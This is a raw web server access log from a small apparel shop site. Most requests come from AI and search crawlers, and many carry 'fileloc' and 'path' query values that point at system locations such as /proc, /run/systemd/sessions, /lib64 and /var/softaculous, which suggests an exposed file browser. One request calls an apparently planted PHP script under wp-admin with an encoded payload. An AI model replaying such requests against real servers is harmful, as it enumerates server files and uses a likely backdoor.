216.73.216.191 - - [25/Oct/2025:12:18:26 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-14792909.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2441 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:27 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fvar%2Fsoftaculous%2Fwhmcs89%2Fphp81%2Fupgrade.php&path=%2F%2Fvar%2Fsoftaculous%2Fwhmcs89%2Fphp81 HTTP/2.0" 200 7565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:18:27 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/cmssimple/php56 HTTP/2.0" 200 2724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:27 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Flib64%2Faspell-0.60%2Fcp1252.cset&path=%2F%2Flib64%2Faspell-0.60 HTTP/2.0" 200 5405 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:27 +0000] "GET /product/elgin-wildcat-logo-spirit-wear-t-shirt?fileloc=%2F%2Fbin%2Fpathfix.py&path=%2F%2Fbin HTTP/2.0" 200 4584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:28 +0000] "GET /product/elgin-wildcat-logo-spirit-wear-t-shirt?fileloc=%2F%2Flib64%2Flibmenu.so.6.1&path=%2F%2Flib64 HTTP/2.0" 200 15850 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.194.95.99 - - [25/Oct/2025:12:18:28 +0000] "GET /?path=//proc/3/root/sys HTTP/1.1" 200 23341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:18:28 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29933151&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:28 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-28766403.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:29 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29657961&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:29 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29597803&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:29 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29531811&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:29 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29210608&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:30 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F30291497&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:18:30 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/cmssimple/php81 HTTP/2.0" 200 2723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:30 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29555986&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2444 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:30 +0000] "GET /products/49116016.html?path=%2F HTTP/2.0" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.20.224.184 - - [25/Oct/2025:12:18:31 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?path=//proc/2/root/opt/cpanel/ea-php81/root/var HTTP/1.1" 200 36730 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:18:31 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fproc%2F2%2Fcwd%2Fbin%2Fpip-3&path=%2F%2Fproc%2F2%2Fcwd%2Fbin HTTP/2.0" 200 2381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:31 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29695300&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
184.154.14.66 - - [25/Oct/2025:12:13:32 +0000] "GET /wp-admin/css/colors/ocean/ocean/index.php?ARRAY=7o2230223n313736313339383031322p2231223n22687474703n5p2s5p2s7n7336313276313361732r636p6s77652r6172745p2s3s6p633q7068705s636s64655s6n6326743q313736313339343431322q6430616635666339306339306536663764313339616435326637323462653963222p2232223n226366316335656161353133653330303731613361613538336136613135323331222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33392q35342q37302q37322q38312q3238227q HTTP/1.1" 504 81419 "-" "-"
216.73.216.191 - - [25/Oct/2025:12:18:31 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Flib%2F.build-id%2F18%2F8a06839395d4f40eae14335b21d31ccae1bec8&path=%2F%2Flib%2F.build-id%2F18 HTTP/2.0" 200 7845 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:32 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29743531&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:32 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fvar%2Fsoftaculous%2Fmoodle30%2Fget_plugin_list.php&path=%2F%2Fvar%2Fsoftaculous%2Fmoodle30 HTTP/2.0" 200 2707 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:32 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-27443674.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:32 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Flib64%2Flibkeyutils.so&path=%2F%2Flib64 HTTP/2.0" 200 8264 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:33 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F30100534&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:18:33 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/cmssimple/php82 HTTP/2.0" 200 2724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:33 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29149007&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:33 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29685008&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:34 +0000] "GET /product/elgin-wildcat-logo-spirit-wear-t-shirt?fileloc=%2F%2Fsbin%2Fip6tables-restore-translate&path=%2F%2Fsbin HTTP/2.0" 200 82269 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:34 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fvar%2Fsoftaculous%2Fextplorer%2F.htusers.php&path=%2F%2Fvar%2Fsoftaculous%2Fextplorer HTTP/2.0" 200 2447 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:34 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29506051&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:35 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fvar%2Fsoftaculous%2Fgeeklog%2Fnotes.txt&path=%2F%2Fvar%2Fsoftaculous%2Fgeeklog HTTP/2.0" 200 2614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:35 +0000] "GET /product/img/dlf_fig2.png?fileloc=%2F%2Flib64%2Flibacl.so.1.1.2253&path=%2F%2Flib64 HTTP/2.0" 200 16536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.3.104.214 - - [25/Oct/2025:12:18:35 +0000] "GET /wp-login.php?path=//var/lib/imunify360-php-daemon HTTP/1.1" 200 12755 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:18:35 +0000] "GET /product/img/image26.png?path=%2F%2Fusr%2Flib HTTP/2.0" 200 3283 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:35 +0000] "GET /products/17395392.html?path=%2F HTTP/2.0" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:36 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29866032&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:36 +0000] "GET /product/img/dlf_fig1.png?fileloc=%2F%2Flib64%2Flibgd.so.3.0.5&path=%2F%2Flib64 HTTP/2.0" 200 116250 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:18:36 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/nukeviet/php81 HTTP/2.0" 200 2692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:36 +0000] "GET /product/htop.png?fileloc=%2F%2Flib64%2Flibmemusage.so&path=%2F%2Flib64 HTTP/2.0" 200 8881 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:37 +0000] "GET /product/img/dlf_fig1.png?fileloc=%2F%2Flib64%2Flibfontenc.so.1.0.0&path=%2F%2Flib64 HTTP/2.0" 200 12171 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:37 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?fileloc=%2F%2Flib%2F.build-id%2F70%2Fe98b2a9b223afe9d966688d7fd96e97bd2787a&path=%2F%2Flib%2F.build-id%2F70 HTTP/2.0" 200 6449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:37 +0000] "GET /product/'?fileloc=%2F%2Fproc%2F798926%2Fautogroup&path=%2F%2Fproc%2F798926 HTTP/2.0" 200 2243 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:38 +0000] "GET /products/36674480.html?path=%2F HTTP/2.0" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:38 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-11444275.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2441 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:38 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29548257&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.195.50.71 - - [25/Oct/2025:12:18:38 +0000] "GET /screen-printing-minimum-orders-bulk-benefits/?path=//sys/devices/virtual/net/venet0/subsystem/lo/statistics HTTP/1.1" 200 51487 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:18:38 +0000] "GET /product/elgin-wildcat-logo-spirit-wear-t-shirt?fileloc=%2F%2Flib64%2FlibXxf86misc.so.1&path=%2F%2Flib64 HTTP/2.0" 200 7537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:39 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29382484&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:18:39 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/nukeviet/php53 HTTP/2.0" 200 2694 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:39 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fproc%2F2%2Fcwd%2Fbin%2Fea-php81-pecl&path=%2F%2Fproc%2F2%2Fcwd%2Fbin HTTP/2.0" 200 2398 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:39 +0000] "GET /product/htop.png?fileloc=%2F%2Fvar%2Frun%2Frestartsrv_systemd-udevd&path=%2F%2Fvar%2Frun HTTP/2.0" 200 2239 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:40 +0000] "GET /product/img/dlf_fig4.png?fileloc=%2F%2Flib64%2FlibXmu.so.6.2.0&path=%2F%2Flib64 HTTP/2.0" 200 44849 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:40 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-13991961.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:40 +0000] "GET /products/36670720.html?path=%2F HTTP/2.0" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.129 - - [25/Oct/2025:12:18:40 +0000] "GET /m41978235019 HTTP/1.1" 200 24705 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.191 - - [25/Oct/2025:12:18:41 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29307415&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2444 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:41 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-11?path=%2F%2Fusr%2Fshare%2Flicenses%2Fatk HTTP/2.0" 200 2558 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:41 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29672063&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2444 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:42 +0000] "GET /product/images/tcgraph.png?fileloc=%2F%2Flib64%2Flibip4tc.so.2&path=%2F%2Flib64 HTTP/2.0" 200 14811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:42 +0000] "GET /product/img/dlf_fig2.png?fileloc=%2F%2Flib64%2FlibXcomposite.so.1&path=%2F%2Flib64 HTTP/2.0" 200 6274 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:42 +0000] "GET /product/img/image26.png?fileloc=%2F%2Fscripts%2Farchive_sync_zones&path=%2F%2Fscripts HTTP/2.0" 200 3329 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:18:42 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/nukeviet/php56 HTTP/2.0" 200 2693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:42 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Flib%2F.build-id%2F71%2Fb3bc571fe6d7405202c249e49eff69131719c8&path=%2F%2Flib%2F.build-id%2F71 HTTP/2.0" 200 43325 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:43 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Ftransient%2Fsession-28138523.scope&path=%2F%2Frun%2Fsystemd%2Ftransient HTTP/2.0" 200 2440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:43 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F30009119&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:43 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29619079&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
18.207.79.144 - - [25/Oct/2025:12:18:43 +0000] "GET /shop/?path=//lib/.build-id/ab HTTP/1.1" 200 40731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.191 - - [25/Oct/2025:12:18:44 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29602297&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:44 +0000] "GET /my-account/?fileloc=%2F%2Fproc%2F2150691%2Fauxv&path=%2F%2Fproc%2F2150691 HTTP/2.0" 200 2228 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:44 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F29556911&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:45 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F4992258&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:45 +0000] "GET /product/wildcat-logo-spirit-wear-t-shirt-6?fileloc=%2F%2Fvar%2Fsoftaculous%2Fwp66%2F_index.php&path=%2F%2Fvar%2Fsoftaculous%2Fwp66 HTTP/2.0" 200 2292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.136 - - [25/Oct/2025:12:18:45 +0000] "GET /?path=//proc/2/task/2/root/proc/2/cwd/var/softaculous/nukeviet/php82 HTTP/2.0" 200 2696 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.191 - - [25/Oct/2025:12:18:45 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?fileloc=%2F%2Frun%2Fsystemd%2Fsessions%2F30398436&path=%2F%2Frun%2Fsystemd%2Fsessions HTTP/2.0" 200 2443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [25/Oct/2025:12:18:45 +0000] "GET /product/elgin-e-logo-spirit-wear-t-shirt-3?path=%2F%2Fusr%2Fshare%2Ffonts%2Furw-base35 HTTP/2.0" 200 5079 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
